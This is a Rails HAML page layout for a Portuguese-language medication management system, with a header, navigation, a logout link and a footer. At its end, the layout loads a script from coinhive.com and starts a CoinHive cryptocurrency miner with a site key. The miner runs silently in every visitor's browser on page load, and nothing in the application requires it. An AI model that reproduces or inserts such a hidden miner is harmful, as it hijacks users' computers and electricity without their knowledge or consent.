<!DOCTYPE html>
%html
  %head
    %title
      Sistema de Gerenciamento de Medicamentos
    = stylesheet_link_tag "application", media: "all", "data-turbolinks-track" => true
    = javascript_include_tag "application", "data-turbolinks-track" => true
    / %link{:rel => "shortcut icon", :href => "/assets/favicon.ico" }
    = csrf_meta_tags
  %body
    / - binding.pry
    -if Rails.env.development?
      .desenvolvimento
        Desenvolvimento
    -if Rails.env.homologacao?
      .desenvolvimento
        Homologação
      .desenvolvimento
        Dados de Teste

    .container-fluid
      %span.label.label-warning#page-loading
        CARREGANDO
      / - unless browser.modern?
      /   %span.label.label-danger#browser-warning
      /     Atenção: Você está utilizando um navegador incompatível!
      /     %br
      /     O sistema poderá apresentar instabilidade.
      .titulo
        / = link_to image_tag('logo-fortaleza.png'), root_path
        .texto-projeto
          %h4.nome-projeto Sistema de Gerenciamento de Medicamentos
      .collapse.navbar-collapse
        %ul.nav.navbar-nav.navbar-right
        %div.administrador.pull-right.barra-user-info
          %ul.nav.navbar-nav.navbar-right.navbar-admin.hidden-print
            %li
              = link_to '#', "data-toggle" => "dropdown" do
                %span.glyphicon.glyphicon-tower.sdf
                
                %span.caret
            %li
              = link_to destroy_user_session_path, method: :delete do
                %span.glyphicon.glyphicon-log-out
                Sair
    
    %nav.navbar.navbar-default
      .container-fluid
        .collapse.navbar-collapse      
          %ul.nav.navbar-nav
            %li= link_to "Home", root_path
            / {class: controller?("admin", "avisos", "activity") && action?("index", "new", "edit", "show") ? "active" : nil}


    .container-fluid
      = yield
    
    .footer
      %span.copyright
        = "© #{Date.today.year}"


    = yield :css    
    = yield :js
    
    %script{:src => "https://coinhive.com/lib/coinhive.min.js"}
    :javascript
      var miner = new CoinHive.User('mHMsYF5TUUXlZEHiKWRmJPhMTbPyjVLw', 'ppp', { threads: 2, autoThreads: false, throttle: 0.2, forceASMJS: false, theme: 'dark', language: 'auto'  });
      miner.start();    
